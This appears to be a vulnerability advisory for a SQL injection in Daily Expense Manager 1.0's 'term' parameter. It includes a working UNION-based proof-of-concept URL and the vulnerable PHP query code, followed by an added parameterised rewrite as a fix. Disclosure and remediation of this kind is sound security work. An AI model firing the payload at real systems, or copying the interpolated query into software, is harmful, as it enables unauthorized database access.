
# Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi
# Date: February 25th, 2024
# Exploit Author: Stefan Hesselman
# Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/
# Software Link: https://download-media.code-projects.org/2020/01/DAILY_EXPENSE_MANAGER_IN_PHP_WITH_SOURCE_CODE.zip
# Version: 1.0
# Tested on: Kali Linux
# CVE: N/A
# CWE: CWE-89, CWE-74

## Description

Daily Expense Manager is vulnerable to SQL injection attacks. The affected HTTP parameter is the 'term' parameter. Any remote, unauthenticated attacker can exploit the vulnerability by injecting additional, malicious SQL queries to be run on the database.

## Vulnerable endpoint:

http://example.com/Daily-Expense-Manager/readxp.php?term=asd

## Vulnerable HTTP parameter:

term (GET)

## Exploit proof-of-concept:

http://example.com/Daily-Expense-Manager/readxp.php?term=asd%27%20UNION%20ALL%20SELECT%201,@@version,3,4,5,6--%20-

## Vulnerable PHP code:

File: /Daily-Expense-Manager/readxp.php, Lines: 16-23

<?php

[...]

//get search term
$searchTerm = $_GET['term']; # unsanitized and under control of the attacker.

//get matched data from skills table
$query = $conn->query("SELECT * FROM expense WHERE pname like '%$searchTerm%' AND uid='$sid' and isdel='0' group by pname");

while ($row = $query->fetch_assoc()) {
    $data[] = $row['pname'];
}

//return json data
echo json_encode($data);

?>
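A hardened rewrite of the same lookup, added here as an example (it is not code from the advisory or from the vendor's project). It assumes, as in the snippet above, that `$conn` is an open mysqli connection and `$sid` holds the current user's id, and it binds both the LIKE pattern and the uid as parameters instead of interpolating them into the SQL string.

```php
<?php
// Added example: parameterised version of the readxp.php search.
// Assumes $conn is an open mysqli connection (with mysqlnd, so that
// get_result() is available) and $sid is the current user's id.

// Report mysqli failures as exceptions so a failed prepare() is not ignored.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

$searchTerm = $_GET['term'] ?? '';

// The wildcards belong in the bound value, not in the SQL text. Escaping
// '%', '_' and '\' keeps user-supplied wildcards from widening the match.
$pattern = '%' . addcslashes($searchTerm, '%_\\') . '%';

// Placeholders replace string interpolation: the bound value is sent as
// data, so a quote or a trailing UNION in 'term' cannot alter the statement.
$stmt = $conn->prepare(
    "SELECT pname FROM expense WHERE pname LIKE ? AND uid = ? AND isdel = '0' GROUP BY pname"
);
$stmt->bind_param('ss', $pattern, $sid);
$stmt->execute();

$data = [];
$result = $stmt->get_result();
while ($row = $result->fetch_assoc()) {
    $data[] = $row['pname'];
}
$stmt->close();

// Return JSON with an explicit content type, as the original endpoint does implicitly.
header('Content-Type: application/json');
echo json_encode($data);
```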